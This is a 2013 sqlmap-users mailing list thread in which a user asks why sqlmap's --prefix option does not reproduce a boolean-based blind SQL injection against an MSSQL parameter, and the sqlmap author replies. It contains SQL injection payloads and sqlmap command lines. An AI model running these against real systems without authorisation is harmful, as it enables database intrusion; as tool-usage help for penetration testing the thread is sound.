Hi.
--prefix is a formation that is going in between of *value* and *payload*:
...=*value prefix payload*...
This simply means that you've forgot for the complete *value* thing in your
case.
In your case usage of custom injection mark (*) is more appropriate:
python sqlmap.py -u "www.target.com/vuln.php?param=(select name from
sysusers where udi=-1 *)"
Kind regards,
Miroslav Stampar
On Wed, Oct 2, 2013 at 2:29 PM, Raphael GONZALEZ <raphag...@gmail.com>wrote:
> Hi,
>
> sqlmap/1.0-dev-25eca9d
>
> I don't manage to get Sqlmap generating the good payload !
>
> Here is my entry point :
> (dbms = MSSQL)
>
> I got this with manual tries in burp :
>
> param value : (select name from sysusers where udi=-1)
> - if the select returns no value => HTTP request returns 200
> - otherwise returns 302 to an error page
>
> so
> with param value : (select name from sysusers where udi=-1 or 1=1) =>
> returns error
> with param value : (select name from sysusers where udi=-1 or 1=2) =>
> returns 200
>
> I thought I could make Sqlmap find a boolean based blind test with OR
> statements
> So I tried this command :
> ./sqlmap.py -r myreq.txt -p param --level=3 --risk=3 --prefix="(select
> name from sysusers where udi=-1 " --suffix=")"
>
> nothing is founded
> but when I look at generated payloads, I get
> [PAYLOAD] -9402(select name from sysusers where udi=-1 OR (9544=9561))
>
> so I always get a number generated before my command
>
> Where am I wrong ?
>
> Thanks
>
>
>
>
> ------------------------------------------------------------------------------
> October Webinars: Code for Performance
> Free Intel webinars can help you accelerate application performance.
> Explore tips for MPI, OpenMP, advanced profiling, and more. Get the most
> from
> the latest Intel processors and coprocessors. See abstracts and register >
> http://pubads.g.doubleclick.net/gampad/clk?id=60134791&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
October Webinars: Code for Performance
Free Intel webinars can help you accelerate application performance.
Explore tips for MPI, OpenMP, advanced profiling, and more. Get the most from
the latest Intel processors and coprocessors. See abstracts and register >
http://pubads.g.doubleclick.net/gampad/clk?id=60134791&iu=/4140/ostg.clktrk
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
